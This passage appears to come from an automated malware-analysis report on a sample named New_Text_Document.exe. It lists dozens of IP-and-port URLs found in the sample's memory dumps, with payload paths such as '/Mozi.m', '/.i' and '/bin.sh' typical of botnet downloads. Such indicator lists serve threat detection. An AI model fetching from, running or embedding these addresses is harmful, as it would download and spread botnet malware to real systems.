                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.55.180.226:50520/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.74.19.229:20753/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.78.133.115:24051/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.78.234.227:45174/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.90.181.102:23471/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.94.9.181:44048/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.96.27.204:3950/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.102.37.40:27369/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.109.29.54:3154/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.111.128.114:13711/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.212.132.103:44463/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.212.142.18:34645/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.212.142.69:36319/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.241.149.204:5273/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.48.152.112:48670/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.123.241.141:53175/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.150.140.184:19997/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.219.221.72:27236/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.232.124.33:20114/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.232.128.147:55179/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.232.130.189:13212/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.232.131.1:30665/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.232.209.108:27409/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.232.209.108:27409/robots.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.233.189.63:57921/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.233.221.162:5278/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.233.241.44:6717/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.233.242.3:62905/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.233.243.14:53813/bin.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.233.243.14:53813/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.249.176.237:33055/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.249.176.237:33055/i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.32.18.223:32496/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.34.4.18:15329/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.37.144.151:59595/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.37.95.221:15541/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.39.173.202:28066/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.40.218.191:10761/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.40.41.132:3878/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.40.94.152:20853/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.43.225.75:33116/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.44.110.122:17316/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.44.31.21:18171/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.45.151.132:6630/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.45.151.18:3604/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.47.49.234:44053/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.86.15.25:34085/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.91.54.34:4000/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.91.54.34:4000/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.91.66.126:26388/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.99.183.235:50195/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.179.216.229:48200/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.179.216.229:48200/i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.192.203.57:45768/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.193.230.152:20450/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.197.102.116:21540/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.197.141.101:13393/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.199.214.121:30074/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.200.146.43:10035/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.201.66.24:20995/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.202.17.108:59997/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.202.255.162:55785/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.206.104.208:13363/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.206.72.30:39459/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.206.86.111:2205/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.25.85.146:23493/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.77.139.9:1758/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://12.171.245.147:11740/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.88.126.204:39680/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.121.199.93:48967/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.122.114.118:59674/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.123.48.251:31111/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.128.103.44:23703/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.130.64.13:30153/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.131.147.18:22537/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://121.133.25.246:35739/.i
